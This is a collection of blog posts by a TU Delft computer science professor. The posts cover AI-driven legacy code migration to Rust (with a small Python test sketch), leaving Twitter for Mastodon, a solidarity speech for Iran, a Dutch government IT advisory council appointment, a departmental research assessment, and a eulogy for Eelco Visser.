Migrating Legacy Like a North Star Engineer

Posted in Society by Arie van Deursen

Microsoft wishes to get rid of a billion lines of C/C++ code. They target a rewrite to Rust by 2030, according to a recently posted job ad. Betting on AI, their “North Star” is:

1 engineer, 1 month, 1 million lines of code.

I admire the bold ambition, turning legacy modernization into the pinnacle of engineering excellence.

It is also dangerously naive to suggest that thanks to AI a few engineers can modernize a multi-million line code base in a matter of months. I know too many board members (in government, finance, and other sectors) who would love to believe this suggestion. Legacy is their main headache. What can be more tempting than just waiting a little until the North Star Engineer emerges? And, lo and behold, there will even be vendors promising they can deliver exactly such engineers, together with tools powered by AI magic.

For board members contemplating waiting for this North Star revolution, here is some advice on things to do without delay:

Disentangle the legacy landscape. Break dependencies. Ensure the legacy system can be modernized incrementally, component by component.
Invest in domain knowledge and deep understanding of the desired behavior. Ensure any discrepancies between old and new functionality can be interpreted correctly.
Invest in an idiomatic, uniform code base. The less variability, the easier any (automated) translation will be.
Invest in testing. Boost the automated test suites so that they exercise all key business logic. As the legacy system delivers mostly correct functionality, use it to (automatically) derive test suites achieving high coverage (which can subsequently be used to test migrated components).
Bring the legacy system into a state in which old and new versions of a component can be deployed in parallel and their results compared.

None of these steps does any actual translation. They are, however, the starting point from which translation can be attempted. They bring the legacy system into a more manageable state, in which the risks of the migration can be mitigated by an incremental approach focused on gradual replacement and continuous feedback on correctness.
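To make the testing and parallel-deployment advice concrete, here is a minimal sketch of a characterization ("golden master") test in Python. The legacy component's observed behavior is recorded as the oracle, and a migrated component is then compared against it. All names (`legacy_fee`, `migrated_fee`, `buggy_fee`) and the fee rule itself are hypothetical stand-ins invented for illustration; a real migration would wrap calls into the actual old and new systems.

```python
from typing import Callable, Dict, Iterable, List, Tuple


# Hypothetical stand-in for a legacy component (assumption, not a real system).
def legacy_fee(amount_cents: int) -> int:
    """Legacy rule: 2% fee, rounded down, with a minimum of 50 cents."""
    return max(50, amount_cents * 2 // 100)


# Hypothetical migrated component that is supposed to behave identically.
def migrated_fee(amount_cents: int) -> int:
    fee = (amount_cents * 2) // 100
    return fee if fee > 50 else 50


# Hypothetical faulty migration: the minimum fee was lost in translation.
def buggy_fee(amount_cents: int) -> int:
    return amount_cents * 2 // 100


def record_golden_master(
    component: Callable[[int], int], inputs: Iterable[int]
) -> Dict[int, int]:
    """Run the legacy component and record its outputs as the test oracle."""
    return {x: component(x) for x in inputs}


def find_discrepancies(
    component: Callable[[int], int], golden: Dict[int, int]
) -> List[Tuple[int, int, int]]:
    """Return (input, expected, actual) for every output that differs."""
    return [
        (x, expected, component(x))
        for x, expected in golden.items()
        if component(x) != expected
    ]


if __name__ == "__main__":
    golden = record_golden_master(legacy_fee, [0, 100, 2500, 10_000])
    print(find_discrepancies(migrated_fee, golden))
    print(find_discrepancies(buggy_fee, golden))
```

Each reported discrepancy still has to be interpreted by someone who knows the domain: it may be a migration bug, or a legacy quirk that should not be carried over. That is why the advice on domain knowledge sits next to the advice on testing.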

For some of these steps, program analysis tools and modern AI may help. But there are no free lunches. Each of the steps requires a substantial investment of effort and resources.

It is safe to assume that Microsoft is well aware of the need for these steps. What’s more, their systems are likely in a relatively good starting position, with high levels of automated testing in place already. But even then, for automated translation to work, substantial additional investments will be necessary.

This brings us back to the board members of ‘normal’ legacy-owning organizations.
Perhaps Microsoft can pull off some North Star Engineering magic. But for the legacy code that runs our taxes, payments and social security, it won’t make a difference. The legacy systems that run our society need continuous attention and investment, starting now, to ensure they stay ready for the decades ahead.

The Original Post

Galen Hunt, December 20, 2025.

I have an open position in my team for a IC5 Principal Software Engineer. The position is in-person in Redmond.

My goal is to eliminate every line of C and C++ from Microsoft by 2030. Our strategy is to combine AI and Algorithms to rewrite Microsoft’s largest codebases. Our North Star is “1 engineer, 1 month, 1 million lines of code”. To accomplish this previously unimaginable task, we’ve built a powerful code processing infrastructure. Our algorithmic infrastructure creates a scalable graph over source code at scale. Our AI processing infrastructure then enables us to apply AI agents, guided by algorithms, to make code modifications at scale. The core of this infrastructure is already operating at scale on problems such as code understanding.

The purpose of this Principal Software Engineer role is to help us evolve and augment our infrastructure to enable translating Microsoft’s largest C and C++ systems to Rust. A critical requirement for this role is experience building production quality systems-level code in Rust—preferably at least 3 years of experience writing systems-level code in Rust. Compiler, database, or OS implementation experience is highly desired. While compiler implementation experience is not required to apply, the willingness to acquire that experience in our team is required.

Our team is driven by a growth mindset. We are diverse team with a wide range of skills and perspectives. We take on bold risks. We work and play well with others. We love to bring value to internal and external customers. We have learned that our diversity and growth mindset is critical to success in the rapidly changing word of AI-based tools.

Our team is part of the Future of Scalable Software Engineering group in the EngHorizons organization in Microsoft CoreAI. Our mission is to build capabilities to allow Microsoft and our customers to eliminate technical debt at scale. We pioneer new tools and techniques with internal customers and partners, and then work with other product groups to deploy those capabilities at scale across Microsoft and across the industry.

Four days after posting, Galen Hunt placed an update:

Update:
It appears my post generated far more attention than I intended… with a lot of speculative reading between the lines.

Just to clarify… Windows is NOT being rewritten in Rust with AI.

My team’s project is a research project. We are building tech to make migration from language to language possible. The intent of my post was to find like-minded engineers to join us on the next stage of this multi-year endeavor—not to set a new strategy for Windows 11+ or to imply that Rust is an endpoint.

20Aug2023

Exit Twitter. Enter Mastodon?

Posted in Research by Arie van Deursen

I used to love Twitter. It was in 2009 that I joined it as @avandeursen. I mostly used it for work, to share and discuss research and education in software engineering. Looking back, this is what I liked best about Twitter:

It allowed me to connect to people who shared similar interests, even if I had never met them before;
It gave me a platform to share my views on current developments in my research area with thousands of people;
It helped me stay current.

Unfortunately, I find it harder and harder to stay excited about Twitter:

Human dignity is increasingly under attack at Twitter, making it a platform of harassment and misinformation. Mechanisms to handle this, such as moderation or the ability to block, have been weakened instead of strengthened.
The owner of Twitter exhibits erratic and irrational behavior, thereby normalizing it.
Twitter randomly blocks or delays sources of useful information (e.g., Mastodon, New York Times), thereby making Twitter itself less useful.
Access to tweets has been limited: Now, they are only visible when logged in to Twitter, and older tweets (before 2014) are lost. To me tweeting is a form of (micro-)publishing, so hiding tweets defeats the purpose.

Thus, it is unavoidable that I take a step back in my Twitter presence. Platform X doesn’t deserve my carefully worded tweets.

As an alternative, I have been exploring Mastodon during the last 12 months. It’s not perfect, but there are a few things to like about it.

For one, it is entirely open, being based on the open ActivityPub protocol, and running on open source software. Naturally, my posts are open too, openly visible to anyone, even those without a Mastodon account.

Furthermore, it is federated, meaning it is a collection of micro-blogging servers that exchange messages with each other. This has interesting consequences:

There is no single owner of Mastodon (or the broader Fediverse of all ActivityPub-compliant servers). Billionaires can’t buy it.
As a user, you can select a server to join, for example a server on your favorite hobby. While this sounds easy, in practice finding a meaningful server to join isn’t always easy (and a potential roadblock to joining – see also below).
The server owners are responsible for formulating and enforcing an anti-harassment policy, which is another factor in selecting a suitable server. Server admins can also block entire other servers if they consider the posts on such a server incompatible with their own code of conduct.
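The consequences of federation listed above can be illustrated with a toy model in Python. This is only a sketch of the idea (independent servers that exchange posts and may refuse posts from servers they block); it is not the ActivityPub protocol or the Mastodon API, and the `Server` class, the `publish` function, and the `.example` domains are all hypothetical.

```python
from dataclasses import dataclass, field
from typing import List, Set, Tuple


@dataclass
class Server:
    """Toy stand-in for one independently run micro-blogging server."""

    domain: str
    blocked: Set[str] = field(default_factory=set)  # domains this admin blocks
    timeline: List[Tuple[str, str]] = field(default_factory=list)

    def receive(self, author: str, text: str) -> bool:
        """Accept a remote post unless the author's server is blocked."""
        sender_domain = author.split("@")[-1]
        if sender_domain in self.blocked:
            return False
        self.timeline.append((author, text))
        return True


def publish(author: str, text: str, follower_servers: List[Server]) -> List[str]:
    """Deliver a post to every follower's server; return domains that accepted."""
    return [s.domain for s in follower_servers if s.receive(author, text)]


if __name__ == "__main__":
    science = Server("science.example")
    hobby = Server("hobby.example", blocked={"spam.example"})
    print(publish("arie@acm.example", "Hello, Fediverse!", [science, hobby]))
    print(publish("bot@spam.example", "Buy now!", [science, hobby]))
```

In this model there is no central component to own or buy: each server applies its own policy, which is the point the list above makes about ownership and moderation.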

My own journey started a year ago on mastodon.social. I picked this server as it was the first and largest Mastodon server (300,000 users at the time of writing). I soon found a few friends who were active on the smaller fediscience.org with around 2,000 users to date. I therefore moved to this server, and have been there for the last 10 months.

In that period I shared around 250 posts, and built up a network of 300-400 people. While these numbers are small compared to Twitter (where I had over 4,000 followers), I find the engagement more meaningful and more pleasant. Mastodon very much reminds me of Twitter in its early days, when everyone did their best to get the most out of this exciting new technology.

Recently I have moved my Mastodon account to the mastodon.acm.org instance. The nice thing about Mastodon is that such moves are transparent to your followers: They automatically follow your new account instead of your old one if you decide to move. The new instance I picked wasn’t around yet when I originally joined Mastodon. It is hosted by the Association for Computing Machinery (ACM), and has around 250 users at the moment. The server is intended to provide a trustworthy space for computing professionals from around the world to connect and engage with each other in a meaningful way – which sounds spot on for me.

As a computing professional, I am a (paying) member of the ACM. I am very happy to see that ACM offers this service, including moderating content to enforce the server rules to be “professional, respectful, inclusive, accessible, honest, and friendly”. Anyone interested in computing can join: I sure hope to see you there!

30Nov2022

Mahsa Jina Amini and Anne Frank: Woman, Life, Freedom

Posted in Society by Arie van Deursen

Speech delivered on November 30, 2022, at TU Delft, as part of the Campus Rally for Iran, in which scholars from 227 universities across the world demonstrated for freedom, justice, and democracy in Iran.

Dear Friends, Salām!

Thank you for the invitation to speak here, which is an honor. My name is Arie, Arie van Deursen. I am a professor in computer science, and I am head of one of the Computer Science Departments here at TU Delft.

Computer science, like many other academic disciplines, is highly international. For example, when I saw the list of 135 universities participating in today’s rally, I recognized many places. I visited or collaborated with scholars from UBC, UVic, Waterloo, Amherst, UC Davis, Stuttgart, Bremen, Milan, Utrecht, and many more.

The reason is that academia is united as one. As academics, we believe in the free, rational exchange of ideas, to make this world a better place. Such discussion does not take place in isolation, but happens together, among academics from all over the world. Scholars depend on each other. We need each other. This also means that

If academia in one country is suffering, all of academia is suffering;
If students and professors are assaulted or arrested at one university, all universities feel the pain;
If, as in Iran right now, academic women, life, and freedom are under attack, all of academia is under attack.

This is why we stand here today, as scholars from all over the world, in solidarity with the students and scholars in Iran, in their peaceful fight for the freedom of the people of Iran.

I also stand here as a head of department. Like the rest of academia, the employees of my department, and the students we educate, come from all over the world. These include dozens of incredibly talented and wonderful people from Iran, many of whom are here today.

I cannot begin to imagine how difficult this period must be for you. You must be deeply concerned about the lives of your loved ones in Iran and the fate of your country. We, your colleagues, your peers, your professors: We think of you and we support you, and we strongly condemn the violence against you. If there is anything we can do to help you, please let us know.

I personally began to understand the situation in Iran a little better when I started supervising a PhD student from Iran, back in 2005. (Since then I have worked with many, and they have all been marvelous.) This first student (Ali Mesbah, now a professor at UBC) defended his thesis in June 2009. As you know, this was an eventful period in Iran, and he, his paranymphs, and many people in the audience wore green wristbands in support of the protests in Iran at that time.

A few years later I read Marjane Satrapi’s beautiful graphic novel Persepolis. I think the book is forbidden in Iran, but my then teenage children had to read it at high school in the Netherlands, which prompted me to read it as well. I was blown away. Persepolis tells Satrapi’s story of growing up in the new Islamic Republic: The oppression, the violence, and the balancing act separating your secret private life from what is allowed in public. It is also a story about moving to Europe as an art student, the loneliness this brings, and about how much you can miss your home country. And it is, ultimately, a story about love and family.

In a Vogue interview in 2016 with Emma Watson (of Hermione Granger fame), Marjane Satrapi gave a clear diagnosis of the root cause of Iran’s current status: “The enemy of democracy isn’t one person. The enemy of democracy is patriarchal culture.”

For resisting that culture, for fighting the patriarchy, Mahsa Jina Amini paid the ultimate price.

Since then, women and men across Iran have followed her lead, demanding freedom. Hundreds of peaceful protesters have been killed, thousands arrested, and tens of thousands assaulted. Despite that, the struggle for freedom continues. An iconic picture to me is that of two young women, no hijab, who were simply offering free hugs in a street in the city of Kermanshah. This is a time when the sad people of Iran just need a hug, they observed.

They were risking their lives. Their bravery is an inspiration to all of us.

Therefore, we stand here, and in more than one hundred universities around the world, in strong solidarity with you, to support you, in your demand for justice and freedom.

Let me conclude with a quote from another strong young woman, Anne Frank. She wrote it in her diary on April 12, 1944, when she was 14 years old. She had spent two years in an attic in Amsterdam, hiding from the German Nazi occupiers of the Netherlands. The day before, their hideout had been discovered by a burglar. They weren’t arrested yet, but the danger was imminent.

This is what she wrote. I’ll read it first in Dutch, and then in English.

Ik weet wat ik wil,
ik heb een doel; een mening,
ik heb een geloof en een liefde.
Laat me mezelf zijn, dan ben ik tevreden.
Ik weet dat ik een vrouw ben,
een vrouw met innerlijke sterkte en veel moed.

I know what I want,
I have a goal, an opinion,
I have a religion and love.
Let me be myself and then I am satisfied.
I know that I am a woman,
a woman with inward strength and plenty of courage.

Woman — life — freedom
Jin — Jiyan — Azadî
Jin — Jiyan — Azadî

Thank you very much!

Arie van Deursen. Delft, November 30, 2022

15Aug2022

Member Advisory Council IT Assessment

Posted in Society by Arie van Deursen

On July 15, 2022, I was appointed by the cabinet of the Dutch government as a member of the Advisory Council IT Assessment (AcICT), starting September 1st, 2022. I am happy and honored by this appointment!

The task of the council is as follows (my own translation):

The Advisory Council IT Assessment judges risks and the chance of success of ICT (Information and Communication Technology) projects within the Dutch national government, and offers advice for improvement. It also assesses the effectiveness and efficiency of the maintenance and management of information systems. The council consists of experts, from academia and industry, who have administrative, supervisory and management experience with regard to the realization, deployment and control of ICT processes.

Ministries submit any project with an ICT component of over 5 million euros to the council. Based on a risk assessment, the council subsequently decides whether it conducts an investigation.

Since 2015, almost 100 assessments have been conducted, on various domains. Recent examples include high school exams, governmental treasury banking, vehicle taxes, and the development process of the Dutch Covid-19 tracking app.

The resulting assessment reports are 7-8 pages long, centered around a number (typically three) of core risks, followed by specific recommendations (also often three) on how to address these risks. Example risks from recent reports include:

“Key project results are not yet complete in the final stages of the project” (treasury)
“An unnecessarily fine-grained solution takes too much time” (exams)
“The program needs to realize too many changes simultaneously” (vehicle taxes)

The corresponding recommendations:

“Work towards a fallback scenario so that the old system can remain in operation until the new system is demonstrably stable” (treasury)
“Establish how to simplify the solution” (exams)
“Reduce the scope” (vehicle taxes)

The assessments are prepared by a team of presently around 20 ICT researchers and research managers. When needed, external researchers with specific expertise are consulted. Assessments follow an assessment framework, which distinguishes nine risk areas (such as scope, architecture, implementation, and acceptance).

The assessments serve to support political decision making, and are aimed at the Dutch parliament and ministers. For each assessment, the minister in question offers a formal reaction, also available from the council’s web site. This helps parliament fulfill its responsibility of checking the executive ministers.

The council consists of five members, each involved part time (for one day per week), for a period of four years, each bringing their own dedicated expertise. For me personally, I see a strong connection with my research and education at the TU Delft, in such areas as software architecture, software testing, and developer productivity.

As a computer scientist, I consider responsible, transparent, and cost-effective digitalization of great importance for (Dutch) democracy and society. The advisory council fulfills a unique and important role, which is closely connected to my interests in software engineering. I look forward, together with my new colleagues from the AcICT, to contributing to the improvement of the digitalization of the Dutch government.

I am presently not aware of comparable councils in other countries, in Europe or elsewhere. If you know of similar institutions in your own country, please let me know!

15Aug2022

Member of the Adviescollege ICT-toetsing

Posted in Society by Arie van Deursen

On July 15, 2022, I was appointed by the Council of Ministers as a member of the Adviescollege ICT-toetsing (AcICT, the Advisory Council IT Assessment), on the nomination of State Secretary Van Huffelen of Kingdom Relations and Digitalization, effective September 1, 2022. I am happy and honored by this appointment!

The council’s mandate is:

The Advisory Council IT Assessment judges the risks and the chance of success of ICT (Information and Communication Technology) projects within the national government, and offers advice for improvement. It also assesses the effectiveness and efficiency of the maintenance and management of information systems. The council consists of experts, from academia and industry, who have administrative, supervisory and management experience with regard to the realization, deployment and control of ICT processes.

Ministries register every project with an ICT component of more than 5 million euros with the council. Based on a risk analysis, the AcICT then decides whether to conduct an investigation.

Since 2015 (at the time still as Bureau ICT-toetsing, BIT), almost one hundred investigations have been conducted, recently for example on modernizing exams, digitizing treasury banking, rationalizing the motor vehicle tax, and the development process of the Coronamelder app.

Most advisory reports are 7-8 pages long and are built around a core of (often three) major risks, followed by a few (also often three) concrete recommendations on how to adjust course in light of these risks. Risks mentioned include, for example:

"Key project results are not yet complete in the final stages of the project" (treasury banking)
"An unnecessarily fine-grained solution takes too much time" (exams)
"The program needs to realize too many changes simultaneously" (motor vehicle tax)

With the corresponding recommendations:

"Work out a fallback scenario so that the old system keeps functioning until the new system is demonstrably stable." (treasury banking)
"Identify how the solution can be made simpler" (exams)
"Reduce the scope" (motor vehicle tax)

The advisory reports are prepared by a team of (at present) around 20 ICT researchers and research managers. Where needed, external researchers with specific expertise are brought in as well. Each investigation is guided by the assessment framework, which distinguishes nine risk areas (such as scope, architecture, implementation, and acceptance).

The advisory reports serve to support political decision making, and are therefore aimed at the Senate and the House of Representatives (Eerste and Tweede Kamer) and at the ministers and state secretaries. The minister responds to the AcICT’s investigation in a letter that is also public (and also available on the AcICT website), after which parliament can scrutinize the advice and the administrative response.

The council itself has five members, each with their own expertise, who do this work part time (one day per week) for a period of four years. For me, I see a nice fit with my research and teaching at TU Delft, for example in the areas of software architecture, software testing, and the efficiency of the software development process.

Responsible, transparent, and cost-effective digitalization is of great importance for Dutch democracy and society. The council plays an important role in achieving this, and I am therefore keen to commit myself to the AcICT.

I also see a nice connection between the council’s tasks and my own knowledge and experience in software engineering. I look forward to contributing, together with my new colleagues at the AcICT, to the successful digitalization of the Dutch government.

4Jul2022

TU Delft Computer Science Research Assessment 2015-2020

Posted in Research by Arie van Deursen

Last year, the TU Delft computer science research programs were evaluated, comprising a reflection on the preceding six years (2015-2020) and an outlook on the next six years.

The assessment follows the Strategy Evaluation Protocol (SEP), used by all Dutch universities, which focuses on research quality, societal impact, and viability. The assessment is conducted by an international external committee. It is based on a self-assessment written by us, as well as a two-day site visit by the committee.

Arie van Deursen and Alan Hanjalic in the Computer Science building

At TU Delft, computer science is organized into two departments: Intelligent Systems, chaired by Alan Hanjalic and Software Technology, chaired by me.

In 2021, Alan and I together worked hard to compile our self-assessment report. It is based on extensive discussions with and contributions by many people, both inside and outside the two departments. It contains our thoughts on what we want computer science in Delft to achieve (our mission), what we did to achieve this (our strategy), an assessment of the success of our approach (our SWOT), and a plan of action for the next years ahead (our future strategy).

We proudly make the full self-assessment report available via this link — the only modification being that for reasons of privacy we omitted some of the appendices that could be traced back too easily to individual faculty members.

As part of the protocol, the committee’s findings, as well as the reaction of the executive board to these findings, have been made available as well, at the central TU Delft site. The committee is “positive about the very high and often excellent research quality, the high quality of the staff as well as the energy, drive and potential of the primarily junior research staff of both departments,” and “recognizes the relevance and societal impact of the research carried out the INSY and ST departments.”

We are grateful to the external committee, and in particular for the 17 recommendations that will help us further strengthen TU Delft computer science. We have integrated these recommendations in the action plan already laid out in our self-assessment, and look forward to working with everyone in our departments and our faculty to execute this action plan in the next few years.

Below, we provide the executive summary of our self-assessment, and we invite you to have a look at our full report.

Self-Assessment Summary

The phenomena of datafication and AI-zation reflect the increasing tendency to quantify everything through data and to automate the decision-making processes that are also largely based on data. Since these phenomena have entered all segments of our lives and since research in computer science (CS) is at the heart of the technological developments underlying these phenomena, CS as a research field has gained strategic importance. TU Delft Computer Science operates at the forefront of these developments with the aim to help society at large, by enabling it to maximally benefit from these phenomena, while protecting it from potential risks. To that end, inspired and driven by the TU Delft core values of Diversity, Inclusion, Respect, Engagement, Courage and Trust (DIRECT), our mission includes (1) conducting world class research in selected computer science core areas; (2) maximizing opportunities for societal impact of our research; (3) providing rigorous, research-inspired engineering education in computer science; and (4) contributing to an international academic culture that is open, diverse and inclusive, and that offers openly available knowledge.

We are organized in two departments, Intelligent Systems and Software Technology, consisting of 5 and 6 sections respectively. Sections are small-scale organizational units, typically headed by a full or associate professor and marking a particular CS disciplinary scope. While the departments are separate units, they work closely together in research and education, and collaborate for societal impact. The convergence between the departments in terms of alignment and joint pursuit of strategic and operational goals has even become so strong over recent years that we can speak of an increasingly recognizable CS entity in Delft organizing its research into five main themes transcending the departmental and section boundaries: (1) decision support; (2) data management and analytics; (3) software systems engineering; (4) networked and distributed systems; and (5) security and privacy. The themes offer critical mass in order to achieve substantial impact, and each theme involves many researchers with various CS backgrounds and expertise.

Award-winning research in these themes achieved during 2015-2020 includes a novel cross-modal (e.g., combining text and images) retrieval method based on adversarial learning; genetic algorithms for the automatic reproduction of software crashes to facilitate automated debugging; and Trustchain, a permission-less tamper-proof data structure for storing transaction records of agents with applications in digital identity. International recognition of our expertise is reflected by numerous leadership roles, e.g., as general or program chairs in numerous flagship conferences, such as AAAI, EuroGraphics, ACM/IEEE ICSE, ACM OOPSLA, ACM RecSys and ACM Multimedia. In the same time period, several staff members also received the highest (inter)national recognition in their fields, such as IEEE Fellow, membership of the Young Academy of the Royal Dutch Academy of Sciences, or the Netherlands Prize for ICT Research. Our scientific reputation also brought us into the consortia of two prestigious NWO Gravitation Projects (“NWO Zwaartekracht”) of the Dutch Research Council, Hybrid Intelligence and BRAINSCAPES – the consortia that “belong to the world top in their field of research or have the potential to do so”.

To maximize societal impact, we embrace eight key sectors: transport and logistics, energy, health and well-being, safety and security, finance, online education, creative industry, and smart cities. To enable and support us in making substantial interdisciplinary impact in these sectors, we have built up expertise, a network of collaborators and societal partners, and established the necessary organizational structures. Prominent examples of our impact in these sectors include the NGS sequencing analysis pipeline we designed and implemented as part of the NIPT test, which is used routinely by hospitals in several countries; Cytosplore, a software system for interactive visual single-cell profiling of the immune system; and SocialGlass, a tool suite for integration, enrichment, and sense-making of urban data. Our close ties with society are also reflected in our strategic collaborations with socio-economic partners, such as ING, DSM, Booking.com, Adyen, Ripple, Erasmus Medical Center and Leiden University Medical Center, leading amongst other things to strategic investments in the form of three large industry-funded labs (with ING, DSM and Booking.com) set up in the assessed time period for a duration of five years. Furthermore, we have invested extensive effort in public outreach, explaining and discussing science with a broad audience, and in particular in the context of complex societal debates in the domain of AI and blockchain. Finally, we play a leading role in regional, national and European initiatives, most notably in the Dutch AI Coalition (NLAIC).

In addition to scientific excellence and strong impact in the selected societal sectors, we are committed to (a) meeting the increasing societal need for highly skilled CS experts, (b) development of human capital in our organization, leading to a new generation of international academic leaders, and (c) advancing the organization and academic culture, with the key pillars of open science, diversity and inclusion.

Regarding (a), we embraced an over 100% increase of our student population, but also aim at securing the highest possible level of their knowledge, skills and academic forming despite scaling up. Therefore, we value a close connection between research and education, and let both MSc and BSc students participate actively in our research. We also formulated an ambitious strategy, the realization of which would enable us to manage this education scale-up efficiently and effectively, leaving sufficient room to our staff for further developing scientific excellence and deploying it for societal impact. Part of this strategy is the growth of our academic staff towards 100 FTE by 2024 to meet the stabilization of the student numbers (due to numerus fixus). Between 2015 and 2020, we already achieved a net growth from 54 to 72 faculty members (+33%), with more to come in the upcoming years.

Next to BSc and MSc students, we are committed to delivering highly skilled CS experts at the PhD level. The number of PhD students grew from 105 to 165 (+57%) in the assessed time period, reflecting our ability to successfully acquire research funding in the present landscape. For our PhD students, the Graduate School defines a framework in which they can develop their skills next to conducting their thesis research. We strive towards completion of PhD theses within four years and organize our supervision, official moments of assessment, requirements on the volume and quality of the conducted research, as well as evidence of scientific impact through publications, accordingly.

Regarding (b), development of human capital: as computer science expertise is in high demand across the globe, finding strong new people as well as retaining our current staff proved highly challenging, especially given the high teaching load due to our record student intake. Therefore, acquiring, developing and retaining academic talent has been one of our most important goals. Dedicated actions, such as devising a Development Track Plan, serve to empower each staff member to contribute to the organization in their own way, based on individual interests, talents and ambitions, and in view of our joint ambition as an organization.

In view of (c), our organization, we embrace open science, with a substantial percentage (80% in 2020) of our articles available as open access, and by making numerous software tools and data sets openly available. We are a highly international organization with employees and students from all over the world. We strive to be an inclusive organization, where staff and students feel at home and valued, regardless of their background, age, gender, sexual orientation or functional disability. In terms of female faculty, we realized a net growth from 11 to 14 faculty members. As the number of men employed also increased, the percentage of female faculty stayed stable at around 20%. We consider this too low. We are committed to addressing this, for which we will take a long-term approach with, amongst other means, dedicated budget reserved for continued openings for female faculty in the upcoming years.

We are proud of our scientific successes and societal impact in the core computer science disciplines as well as in interdisciplinary research in our target societal sectors. This is especially so as those were achieved in a period that was transformational for TU Delft Computer Science, characterized by substantial growth and development across our organization and activities. We anticipate an even stronger societal demand for our research and expertise in the future. We will therefore continue to initiate, participate in, and take on a key role in effective and interdisciplinary partnerships at the university (TU Delft AI), regional (LDE), national (ICAI, IPN), and European (ELLIS, CLAIRE) levels. Furthermore, we will continue the growth path for our staff, in order to build up capacity enabling us to further develop our scientific excellence and offer our strongly increased student population the world-class research-intensive education they deserve. To achieve this, we center the next steps in our ongoing transformation around people, organization, and profiling, and identify seven key actions for the upcoming years that aim at (1) improving our attractiveness as an employer; (2) improving diversity and inclusion; (3) improving the execution of the PhD program; (4) expanding our staff capacity; (5) aligning our office space with the optimal way of working; (6) articulating the scientific profile; and (7) boosting our scientific and societal impact.

15Apr2022

Eelco Visser (1966-2022)

Posted in Research by Arie van Deursen

Text of the eulogy for Eelco Visser (12 October 1966 – 5 April 2022) at his farewell ceremony held in Leusden, April 2022. Original text in Dutch.

I stand in front of you, in total disbelief, as head of the department for which Eelco Visser has worked the last 15 years.

I would like to offer you my perspective on Eelco’s significance, as a scientist, as a teacher, and as a person.

Eelco and I got to know each other in 1992, thirty years ago.

At the time, I was halfway through my PhD in Amsterdam, working in the group of Paul Klint. Eelco was studying in Amsterdam, following Paul’s courses. These were so inspiring to Eelco that he decided to join Paul’s group, first to write his master’s thesis, and then to work on his PhD.

It didn’t take long before Eelco and I had a connection. We had extensive discussions about research. The details don’t matter, and they didn’t really lead to concrete results. But thirty years later I still remember the substantive drive, the deep desire to profoundly understand a problem, the feeling of working on something very important, and, of course, Eelco’s tenacity.

Eelco has been able to maintain that same drive for thirty years. Just like he knew how to inspire me, year after year he has inspired his students and his (international) peers — always driven by content, always persistent.

This contributed to Eelco’s research being of the highest international level. Let me illustrate this through an award he received in 2020, a so-called Most Influential Paper award. This is an award you get ten years after publication, once it has been established that your paper actually made the biggest impact.

Eelco received this award for his article from 2010 on Spoofax, written with (then) PhD student Lennart Kats. Eelco was very proud of this award, and rightly so. In fact, he was so proud that he wrote a (long) blog post about it, entitled “A short history of the Spoofax language workbench.”

This “short history” starts in 1993 with Eelco’s PhD research in Amsterdam. Next, Eelco explains his journey, from Portland as a postdoc, via Utrecht as assistant professor, to Delft as associate and full professor. Each of these stops provides building blocks for the award-winning paper from 2010. And then, Eelco’s “short history” continues: He describes what his group in those ten years after the paper’s publication has done, and what good things he still has in store for the time to come.

To me, this “short history” is signature Eelco:

Visionary, working year after year on building blocks that all belong together
System-driven, with working software that he preferably contributes to himself
In a team, together with his PhD students, postdocs, engineers, students, and numerous international co-workers.

This short history also serves to illustrate the international side of Eelco’s work. He was very active, and loved, within international organizations like IFIP and ACM SIGPLAN. He succeeded in bringing the flagship SPLASH conference to Europe for the first time.

And, naturally, Eelco had a vision on how to improve things: All those conferences putting effort in ad hoc web sites: There had to be a better way. And so, in line with his systems philosophy, he designed the CONF system that has been up and running for ten years now. And he managed to convince hundreds of conferences to use his system, for a fee.

Likewise, Eelco had a vision on education, and he knew how to realize it. In his opinion, programming education just had to be better. Thus, he designed a system, WebLab, which has also been in operation for almost 10 years now. And here too he managed to convince countless teachers to use his system.

In addition, Eelco had a well-thought-out opinion about the courses that belong in a computer science program. So when we needed to revise our curriculum, Eelco was the perfect candidate to chair the associated committee. Eelco did this graciously, in a calm and persistent manner, reasoning from educational principles to settle disputes. The result is rock solid.

Eelco’s education is well characterized by Willem-Paul Brinkman in the online Farewell Community: Without maybe realizing it, many generations of Delft students will benefit from his teaching innovations.

Eelco was proud of his Programming Languages Group. He built it up from scratch into an international top group. He took good care of his people, fighting for the best equipment and offices. As a member of the departmental management team, he fought for computer science in full, at faculty and university level. Nationally he was active in, for example, the Dutch National Association for Software Engineering VERSEN.

And how was Eelco able to realize all this? What was his secret?

Perhaps Eelco actually liked (a little) resistance. He was not afraid to disagree: after all, he had thought deeply about his opinion. And he was fine with being challenged: it was a sign that he was well on his way to breaking the status quo.

Maybe not everyone always found this easy. But Eelco was also very friendly, and certainly willing to change his mind.

And, Eelco was also patient: Big changes take time. If he saw that he had insufficient supporters, he could wait. Or, under the radar, start small in order to set his own plans in motion.

How much we will miss Eelco in Delft! The visionary, the obstinate, the focus on the content, the love for computer science, the tenacity, and the attention for students and colleagues: exactly what we need so much in Delft.

Let me conclude with a few words related to Corona and the lockdown. The past few years, Eelco and I were in touch weekly, mostly within the departmental management team, but also often one-on-one. All online, from home. We discussed departmental matters, small and large, as well as the impact of Corona. On one thing we agreed: Being at home more, seeing more of your children, doing more with the family: we both experienced this as a gift.

Due to the lockdown, I don’t know when it was that I last saw Eelco in person. I think it was on October 14, at the PhD defense of Arjen Rouvoet. This was a beautiful day, and this is how I like to remember Eelco: Science at the highest level, international peers in substantive debate, a cum laude PhD defense, and Eelco happy, radiant in the midst of his PL group.

Dear family, friends, colleagues, everyone: We will miss Eelco very much. Each of us has his or her own, wonderful memories of Eelco. Today is a day to hold on to that, and to share those memories with each other.

I wish you all, and especially the family, all the best.

15Apr2022

Eelco Visser (1966-2022)

Posted in Research by Arie van Deursen

Speech given at the funeral service for Eelco Visser (12 October 1966 – 5 April 2022) on 12 April 2022 in Leusden. English translation available.

I stand here, in total disbelief, as head of the department where Eelco Visser worked for the past 15 years.

I would like to tell you something about Eelco’s significance, as a scientist, as a teacher, and as a person.

Eelco and I got to know each other in 1992, thirty years ago.

At the time I was halfway through my PhD in Amsterdam, working in Paul Klint’s group. Eelco was studying in Amsterdam then, and attended Paul’s lectures. These inspired him so much that he joined Paul’s group, first to complete his master’s thesis and later to pursue his PhD.

Eelco and I quickly clicked. We had extensive discussions about research. The details do not matter, and they did not lead to any real result. But thirty years later I still remember the substantive drive, the wish to truly understand a problem, the feeling of working together on something very important, and of course Eelco’s tenacity.

Eelco managed to hold on to that same drive for thirty years. Just as he knew how to inspire me, year in, year out he won the loyalty of his students, his PhD students, and his international colleagues: always starting from the content, and always persistent.

